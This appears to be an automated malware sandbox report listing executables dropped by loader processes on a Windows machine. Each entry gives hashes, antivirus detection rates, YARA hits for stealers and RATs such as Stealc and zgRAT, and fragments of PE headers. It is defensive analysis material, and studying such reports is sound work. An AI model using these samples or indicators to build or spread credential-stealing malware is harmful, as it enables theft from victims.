                                                      SSDEEP:3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
                                                      MD5:7A02AA17200AEAC25A375F290A4B4C95
                                                      SHA1:7CC94CA64268A9A9451FB6B682BE42374AFC22FD
                                                      SHA-256:836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
                                                      SHA-512:F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6679627
                                                      Entropy (8bit):6.628951125972036
                                                      Encrypted:false
                                                      SSDEEP:98304:Wa0mgFKceo820M9AooDDyBRU8+boh3ruUNsc9Ql7JtdLrH:Wa0mgFKceo8vMoD2BRGwuUNnQzrH
                                                      MD5:F66BEEE3AAE7CD92F02270A910B70231
                                                      SHA1:F8F1CE1DDE9118E6D40426256756A201BE9B0F65
                                                      SHA-256:A89687D296782DB168A92A496FB865D481666CF53588684F69ECAC509711DA16
                                                      SHA-512:635B89682A25F6C64D4AF69D6AFEBCA753E6B0595EDF5585231E7DAA53778CECCD24D36783026E9785245CC9D14AEBAF2FA4CA179F5EAEFBD966A92140790480
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.f.L_..&.........#..G...Z...f...........H...@...................................f....... .........................B........................................)............................H......................................................text.....G.......G.................`.P`.data.........H.......G.............@.`..rdata....... H.......H.............@.`@/4............H.......H.............@.0@.bss......f...L.......................`..edata..B............jL.............@.0@.idata...............lL.............@.0..CRT....4............vL.............@.0..tls.................xL.............@.0..reloc...).......*...zL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...T\.............@..B/55.....B.............\.............@..B/67.....T.............].............@.0B/80.....a.............].

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):10796768
                                                      Entropy (8bit):7.884437457246237
                                                      Encrypted:false
                                                      SSDEEP:196608:I7A71NIOC732QZMymBHd+3WGeFdJJMGHPP/CPZ5za/+qKcDxNY5fv7RFHnTKm:IA5NIOC73RdmB9+ReFV/m5zQAfHHTF
                                                      MD5:489F9C4FC0AFA8D1BE37BC5E2F57833B
                                                      SHA1:C2BAC602A73C19B345B64E0B7CF2F837BE307B61
                                                      SHA-256:D9DBFBC8294CBF6A32D43413ED328594EE058D7356C26EB5CD196F9F4867C078
                                                      SHA-512:7F43D972F58A025D09143C57351221FE7B10C1756A0C5578AC42698C21EA05986D4BBC0C7FF4BE339C2D0930B505E4F4DDA53C0800D84B059A21BE938ADB678E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].g...................N...T.....~.O.. ... O...@.. .......................`......e)....@.................................0.O.K....@O.V.T.................@........O.............................................. ............... ..H............text.....N.. ....N................. ..`.sdata....... O.......N.............@....rsrc...V.T..@O...T...O.............@..@.reloc.......@.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):4278784
                                                      Entropy (8bit):7.1283818624071476
                                                      Encrypted:false
                                                      SSDEEP:98304:if7X0ZueTTPs6deIF+iHtcbBt2VSFjUCaZ:8bPeVdeIMiHmbeVS
                                                      MD5:7FA5C660D124162C405984D14042506F
                                                      SHA1:69F0DFF06FF1911B97A2A0AA4CA9046B722C6B2F
                                                      SHA-256:FD3EDFAFF77DD969E3E0D086495E4C742D00E111DF9F935ED61DFBA8392584B2
                                                      SHA-512:D50848ADBFE75F509414ACC97096DAD191AE4CEF54752BDDDCB227FFC0F59BFD2770561E7B3C2A14F4A1423215F05847206AD5C242C7FD5B0655EDF513B22F6C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................8.....L.............@...........................A..................@..............................x"... ....7..................`..@............................P......................................................CODE................................ ..`DATA.... -..........................@...BSS......................................idata..x".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc..@....`......................@..P.rsrc.....7.. ....7.................@..P..............A......JA.............@..P........................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:modified
                                                      Size (bytes):1873408
                                                      Entropy (8bit):7.95067200947208
                                                      Encrypted:false
                                                      SSDEEP:49152:4LdLkHiRDkiklbNk5/z73WRWilUyAuioc38Dz:4xL0v6/HiWinMx3
                                                      MD5:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      SHA1:92D0E6AEBA51AEB9D79196D06BE442768F1A78C9
                                                      SHA-256:EDC95E00991BBD33CEB4CB2CFD88AA714011ED69296EC62CC40C0BE6C83450F3
                                                      SHA-512:926ECA735E4B3EAC6CD6F178CE98721D50FC4F3AA8FD9BF49332C9D58B14CEB12FFB0BB029FB1162F771B8AD76D6C35F58B2AB4F99B77D5C81A29A55A2E7C50F
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`J...........@...........................J......>....@.................................W...k............................JJ..............................IJ..................................................... . ............................@....rsrc...............................@....idata ............................@... . *.........................@...qnrefdmv......0..|..................@...gekfttam.....PJ......p..............@....taggant.0...`J.."...t..............@...........................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):360448
                                                      Entropy (8bit):6.667690093536603
                                                      Encrypted:false
                                                      SSDEEP:6144:yEIbJdhhk012D9kEsrwRdvwoShfvM4MH0RoeAcGho33vXvIKgI5TdFaA51TIrxLD:yEIbJvhk0azddWtyA51C09ssEN8mhGfp
                                                      MD5:2F1D09F64218FFFE7243A8B44345B27E
                                                      SHA1:72553E1B3A759C17F54E7B568F39B3F8F1B1CDBE
                                                      SHA-256:4A553C39728410EB0EBD5E530FC47EF1BDF4B11848A69889E8301974FC26CDE2
                                                      SHA-512:5871E2925CA8375F3C3CE368C05EB67796E1FBEC80649D3CC9C39B57EE33F46476D38D3EA8335E2F5518C79F27411A568209F9F6EF38A56650C7436BBAA3F909
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...<..f..........................................@..........................@............@.....................................x................................H...................................................................................text.............................. ..`.rdata...).......*..................@..@.data...X........^..................@....reloc...H.......J...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):506368
                                                      Entropy (8bit):5.884711667889521
                                                      Encrypted:false
                                                      SSDEEP:12288:G0Rr0R4h0h0mh0nzh02wy53Ih09s6MZEBe1SxHyVSSqDa7HV:BMuBe1MHyVSSqDa7
                                                      MD5:6760374F17416485FA941B354D3DD800
                                                      SHA1:D88389EC19AC3E87BC743BA3F8B7C518601FDBF9
                                                      SHA-256:9DC31FBD03DA881700908423EB50C6B0C42C87FEC28E817449D3DD931802C9F5
                                                      SHA-512:6E4D2F17CB93FE831198C2EAA35BF030D6A06D620645D3E1452C6BD6E77E42BAA9DC323FD60A2C5AE1D89124ADDE69972C489739D4BD73BA01B95B829A777EAB
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(...............0..>...z......>\... ...`....@.. ....................................@..................................[..K....`...v........................................................................... ............... ..H............text...D<... ...>.................. ..`.rsrc....v...`...x...@..............@..@.reloc..............................@..B................ \......H.......4S..............8................................................*...(....(....*..(....*..(....*.0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~....(.....%..G~....(.....%..H~....(.....%..e~....(.....~....(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~....(....o........9......I~....(.......8C........~....(....o....:......{....~....(....8......{....~....(.........(..........

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):921600
                                                      Entropy (8bit):6.590101281556018
                                                      Encrypted:false
                                                      SSDEEP:12288:eqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgagTe:eqDEvCTbMWu7rQYlBQcBiT6rprG8a4e
                                                      MD5:5D8D57A3729CFBBABA4E3E60D6BEF3D8
                                                      SHA1:5C1C7352807360845A264980C17FA5DCCF4A0498
                                                      SHA-256:A11D5BA1EB5D8D3D5B6E29CAF6C4FA6C3A74A28B66FCF29AB46891D2FF9747B3
                                                      SHA-512:7145AE65934DE9D06B0A6813C4E542ED97CB7789BEB28E34D492A732204BC312D2A0382E185875B8749911EDDE0DCBF22D83560F45E7399533ED3FE47425A8DA
                                                      Malicious:true
                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f.........."..........`......w.............@..........................p......MD....@...@.......@.....................d...|....@..,........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...,....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1381143
                                                      Entropy (8bit):7.942673979265856
                                                      Encrypted:false
                                                      SSDEEP:24576:b9yEBs1ZKaxv6rRVO9VdLCjJehm4v2TeLUzguXpdQhgRQ7SoYafkW:bxqZK66rb4V0cxtQzv5dQhgRQ7SxID
                                                      MD5:2B01C9B0C69F13DA5EE7889A4B17C45E
                                                      SHA1:27F0C1AE0DDEDDC9EFAC38BC473476B103FEF043
                                                      SHA-256:D5526528363CEEB718D30BC669038759C4CD80A1D3E9C8C661B12B261DCC9E29
                                                      SHA-512:23D4A0FC82B70CD2454A1BE3D9B84B8CE7DD00AD7C3E8AD2B771B1B7CBCA752C53FEEC5A3AC5A81D8384A9FC6583F63CC39F1EBE7DE04D3D9B08BE53641EC455
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46%*46,R.6&*46,R.64*46%*56.*46>..6+*46>..6$*46>..6$*46Rich%*46........PE..L.....GO.................p....>..B...8............@...........................G......&....@.................................4........0G..r....................?.H....................................................................................text....o.......p.................. ..`.rdata..b*.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc....r...0G..t..................@..@.reloc...2....G..4..................@..B................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1835520
                                                      Entropy (8bit):7.947999914727406
                                                      Encrypted:false
                                                      SSDEEP:49152:uVu2EnPTm/0lKfYfhA93aTyjg7dasLOzGvVtfjdRCjp:h2+Tm/mKBVgysDiz
                                                      MD5:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      SHA1:3EA05F000AD46070D41E449B3F1B7419144D98FF
                                                      SHA-256:D1DC3ECA3C7794FEE2EF250E63D99101AAAE555751AB83EEFA9F8952A7F2C7D9
                                                      SHA-512:C92C15990C12770D75310B8EE32181CE165348C898CB8665AFD28BE7E4224F0876BA7AAB2667246E393C90AD3FACAB79FD03B4876D5B086D436D52188954C448
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L.../..f......................$......pi...........@...........................i.....6D....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..)...%......:..............@...fcorzhao......O......<..............@...ykxfeacd.....`i.....................@....taggant.0...pi.."..................@...................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000002001\gold.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):320000
                                                      Entropy (8bit):7.989223789389698
                                                      Encrypted:false
                                                      SSDEEP:6144:mmAUwI0Q3r6UBqC7e8O5rvH9MMoBfOWf6dX/mY9Row3:mmANIL3OUBqC7e15M/6d/Mw3
                                                      MD5:389881B424CF4D7EC66DE13F01C7232A
                                                      SHA1:D3BC5A793C1B8910E1ECC762B69B3866E4C5BA78
                                                      SHA-256:9D1211B3869CA43840B7DA1677B257AD37521AAB47719C6FCFE343121760B746
                                                      SHA-512:2B9517D5D9D972E8754A08863A29E3D3E3CFDE58E20D433C85546C2298AAD50AC8B069CAFD5ABB3C86E24263D662C6E1EA23C0745A2668DFD215DDBDFBD1AB96
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..f............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......h...p...........................................................>I.....=NW...S.(..`}C..P?2...h..l.<A.I.....CN..../.u..T.......@.$.0..r..."_8)L...s.YQ..%./?...L..7e&[.z.....*..j..8J...sn.=..O...|...n.....gUDG..HK....R.T...1Lz.....F..^l.y.{J..B|...`.oH.3.....VN..f.}J.../.?.......4nE.S....3A..r.M..qf..{.....!IU../.M.?>......0.e..X.f...i.Ui....`.w..fa..Lwi.VM.i.4...i..J...p....s.]....)l.......0.i$|..s....+.?..^(b|zcb.N......v.dG.e..]. ..".<x.n...h[.Y

                                                      C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):921600
                                                      Entropy (8bit):6.590101281556018
                                                      Encrypted:false
                                                      SSDEEP:12288:eqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgagTe:eqDEvCTbMWu7rQYlBQcBiT6rprG8a4e
                                                      MD5:5D8D57A3729CFBBABA4E3E60D6BEF3D8
                                                      SHA1:5C1C7352807360845A264980C17FA5DCCF4A0498
                                                      SHA-256:A11D5BA1EB5D8D3D5B6E29CAF6C4FA6C3A74A28B66FCF29AB46891D2FF9747B3
                                                      SHA-512:7145AE65934DE9D06B0A6813C4E542ED97CB7789BEB28E34D492A732204BC312D2A0382E185875B8749911EDDE0DCBF22D83560F45E7399533ED3FE47425A8DA
                                                      Malicious:true
                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f.........."..........`......w.............@..........................p......MD....@...@.......@.....................d...|....@..,........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...,....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1873408
                                                      Entropy (8bit):7.95067200947208
                                                      Encrypted:false
                                                      SSDEEP:49152:4LdLkHiRDkiklbNk5/z73WRWilUyAuioc38Dz:4xL0v6/HiWinMx3
                                                      MD5:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      SHA1:92D0E6AEBA51AEB9D79196D06BE442768F1A78C9
                                                      SHA-256:EDC95E00991BBD33CEB4CB2CFD88AA714011ED69296EC62CC40C0BE6C83450F3
                                                      SHA-512:926ECA735E4B3EAC6CD6F178CE98721D50FC4F3AA8FD9BF49332C9D58B14CEB12FFB0BB029FB1162F771B8AD76D6C35F58B2AB4F99B77D5C81A29A55A2E7C50F
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`J...........@...........................J......>....@.................................W...k............................JJ..............................IJ..................................................... . ............................@....rsrc...............................@....idata ............................@... . *.........................@...qnrefdmv......0..|..................@...gekfttam.....PJ......p..............@....taggant.0...`J.."...t..............@...........................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):192000
                                                      Entropy (8bit):6.395265378509869
                                                      Encrypted:false
                                                      SSDEEP:3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
                                                      MD5:7A02AA17200AEAC25A375F290A4B4C95
                                                      SHA1:7CC94CA64268A9A9451FB6B682BE42374AFC22FD
                                                      SHA-256:836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
                                                      SHA-512:F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):464896
                                                      Entropy (8bit):5.410841803375821
                                                      Encrypted:false
                                                      SSDEEP:12288:QeeeeVeeeeeegeeKVe3zJQX7MHv+xY2DxDdeeeeVeeeeeegeeKVZ3zY:QeeeeVeeeeeegeeKVe3zJ7QdeeeeVeeq
                                                      MD5:37D198AD751D31A71ACC9CB28ED0C64E
                                                      SHA1:8EB519B7A6DF66D84C566605DA9A0946717A921D
                                                      SHA-256:1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
                                                      SHA-512:60923C0A8CE5FD397D49749CCEE68CA3FE294D7323551CE9755410AC16BFFF56A35BEE3E6B9A67D57CDFCB43E4F164712F33CD255B76689174DCF4C475976C96
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..L..........vk... ........@.. ....................................`.................................$k..O............................`.......i............................................... ............... ..H............text...|K... ...L.................. ..`.rsrc................N..............@..@.reloc.......`......................@..B................Xk......H.......(6...,...........b..0............................................0..I........~....}.....(.... ....(.....(.... <...(.....{....r...po...........o....&*....0...........('..... .u.5C. .w)F5.. C..6;..... .w)F.}8M.... .d?^;..... c...P. .u.;....8*.... .O..5.. .np.;..... .O...v8..... R,...W. ..G.;..... B.J../8.....r...p(....:....8.....r'..p(....:....8.....r-..p(....:....8.....r5..p(....-t8.....r9..p(....-h8.....rC..p(....-\+x.rM..p(....-S+i.rU..p(....-J+Z.r_..p(....-A+K.rg

                                                      C:\Users\user\AppData\Local\Temp\1000285001\2.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):689664
                                                      Entropy (8bit):6.8668413422174535
                                                      Encrypted:false
                                                      SSDEEP:12288:lht5Z3o/mPatX0hz6hWIShEYZUuWygFYK1hsHyLMLH/KweErse7K4m6o/OGSew/X:lht5Z3oCadeb
                                                      MD5:B859D1252109669C1A82B235AAF40932
                                                      SHA1:B16EA90025A7D0FAD9196AA09D1091244AF37474
                                                      SHA-256:083D9BC8566B22E67B553F9E0B2F3BF6FE292220665DCC2FC10942CDC192125C
                                                      SHA-512:9C0006055AFD089EF2ACBB253628494DD8C29BAB9D5333816BE8404F875C85AC342DF82AE339173F853D3EBDB2261E59841352F78F6B4BD3BFF3D0D606F30655
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 69%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..f.................z..........n.... ........@.. ....................................@.....................................W....... ............................................................................ ............... ..H............text...ty... ...z.................. ..`.rsrc... ............|..............@..@.reloc..............................@..B................P.......H.......(...........J...................................................D...>n..8...2..ax...^s(O.L.~.g..?....M6...;.u....=.k.d..w-X^.k|..e..Qv.i..".n......s.W..Dl.\s.U..v..CEix.1...G....5..eM...k..[..wx1..).w..._...Tp...2F..S..U.@.6...'..qB.]O...R..0./....ES_{|..H.?...<.w.....m...f.T..e._.l.g...']..^...u..lC......{..d0...s.G....Fo.....vt.L2k|w...Sr...B.1.Y2.W".....,.}....7.*c..^........H.....p.!U...g.M7.m.......OG1......Is.>....?pEH....rO....:\....].

                                                      C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1381143
                                                      Entropy (8bit):7.942673979265856
                                                      Encrypted:false
                                                      SSDEEP:24576:b9yEBs1ZKaxv6rRVO9VdLCjJehm4v2TeLUzguXpdQhgRQ7SoYafkW:bxqZK66rb4V0cxtQzv5dQhgRQ7SxID
                                                      MD5:2B01C9B0C69F13DA5EE7889A4B17C45E
                                                      SHA1:27F0C1AE0DDEDDC9EFAC38BC473476B103FEF043
                                                      SHA-256:D5526528363CEEB718D30BC669038759C4CD80A1D3E9C8C661B12B261DCC9E29
                                                      SHA-512:23D4A0FC82B70CD2454A1BE3D9B84B8CE7DD00AD7C3E8AD2B771B1B7CBCA752C53FEEC5A3AC5A81D8384A9FC6583F63CC39F1EBE7DE04D3D9B08BE53641EC455
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46%*46,R.6&*46,R.64*46%*56.*46>..6+*46>..6$*46>..6$*46Rich%*46........PE..L.....GO.................p....>..B...8............@...........................G......&....@.................................4........0G..r....................?.H....................................................................................text....o.......p.................. ..`.rdata..b*.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc....r...0G..t..................@..@.reloc...2....G..4..................@..B................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):321536
                                                      Entropy (8bit):7.984064781404801
                                                      Encrypted:false
                                                      SSDEEP:6144:/6ZNaeEuexVOkKu/A9UZMOqMVr57KLMLPQ5uRXg6hUm8:/BvOkHPEUsYLeIXgDm8
                                                      MD5:FF5AFED0A8B802D74AF1C1422C720446
                                                      SHA1:7135ACFA641A873CB0C4C37AFC49266BFEEC91D8
                                                      SHA-256:17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
                                                      SHA-512:11724D26E11B3146E0FC947C06C59C004C015DE0AFEA24EC28A4EB8145FCD51E9B70007E17621C83F406D9AEB7CD96601245671D41C3FCC88A27C33BD7CF55AC
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 66%
